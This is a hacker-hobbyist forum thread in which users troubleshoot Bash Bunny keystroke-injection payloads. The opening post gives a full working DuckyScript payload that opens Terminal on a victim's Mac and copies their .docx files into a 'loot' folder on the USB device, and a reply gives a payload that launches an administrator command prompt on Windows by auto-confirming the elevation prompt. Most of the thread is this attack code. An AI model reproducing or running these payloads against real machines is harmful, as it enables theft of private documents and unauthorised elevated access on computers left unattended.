aaaaaaaa Posted March 10, 2017 Share Posted March 10, 2017 Hello, I am working on a script to copy document files from an OSX user's documents directory, and there seems to be an issue with text encoding of my copy command. The script is suppose to open a terminal, copy 20 seconds worth of docx files from the users ./Documents directory to /Volumes/BashBunny/loot directory, then close the terminal, unmount the drive, then make the led green. I created the loot dir on the root of the bunny ahead of time. The line that is having trouble is here" QUACK STRING find ./Documents -iname "*.docx" -exec cp "{}" /Volumes/BashBunny/loot \; Here is the terminal output from when the bunny runs this line: find ./Documents -iname *.docx -exec cp {} /Volumes/BashBunny/loot ; find: -exec: no terminating ";" or "+" The bunny seems to be stripping quotes and backslashes. I have tried to use similar bash commands with other special characters, but I also seem to have the same issue with pipes. I rewrote everything just having the bunny call a bash script. I had no issues using that approach, but I want to get it working in duckyscript and not rely on additional scripts. I also noticed when trying to access directories using ~/, the bunny changed my text to /root, although the username on the target system that was executing the payload was not root. Reading through the duckyscript and bashbunny wikis do not seem to mention any of this substitution, unless I am colpeltely missing it... Thanks! LED R ATTACKMODE HID STORAGE source bunny_helpers.sh LED B QUACK DELAY 1000 QUACK COMMAND SPACE QUACK DELAY 800 QUACK STRING Terminal QUACK DELAY 500 QUACK ENTER QUACK DELAY 500 QUACK ENTER QUACK DELAY 500 QUACK STRING find ./Documents -iname "*.docx" -exec cp "{}" /Volumes/BashBunny/loot \; QUACK ENTER QUACK DELAY 10000 QUACK DELAY 10000 QUACK COMMAND q QUACK DELAY 500 QUACK ENTER QUACK COMMAND SPACE QUACK DELAY 800 QUACK STRING Terminal QUACK DELAY 800 QUACK ENTER QUACK STRING diskutil unmount /Volumes/BashBunny QUACK DELAY 500 QUACK ENTER QUACK DELAY 500 QUACK COMMAND q QUACK DELAY 500 QUACK ENTER LED G Quote Link to comment Share on other sites More sharing options...
Tasty Posted March 10, 2017 Share Posted March 10, 2017 Hey! Its important to remember that the payloads appear to be running in the context of a bash terminal on the bashbunny (hence the name) So! Something I have run into is bash terminal enterprising QUACK or Q statements, such as / or cd ~/ or even quotations A really easy way to get around this is to place all the "DuckyScript" into txt file such as part1.txt and use QUACK switch2/part1.txt Example payload.txt: #!/bin/bash LED R 500 ATTACKMODE HID STORAGE QUACK switch2/kickOff.txt LED G Example kickOff.txt: GUI r DELAY 500 STRING powershell Start-Process cmd -Verb runAs ENTER DELAY 500 ALT y DELAY 100 STRING HelloWorld! ENTER Let me know if i can help anymore! Quote Link to comment Share on other sites More sharing options...
aaaaaaaa Posted March 10, 2017 Author Share Posted March 10, 2017 Ahhh, ok. Thank you for the clarification. That makes sense. I was trying to do it all in one file. Thank you for the help! Quote Link to comment Share on other sites More sharing options...
audibleblink Posted March 10, 2017 Share Posted March 10, 2017 It appears we had the same idea. https://github.com/hak5/bashbunny-payloads/pull/36 Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.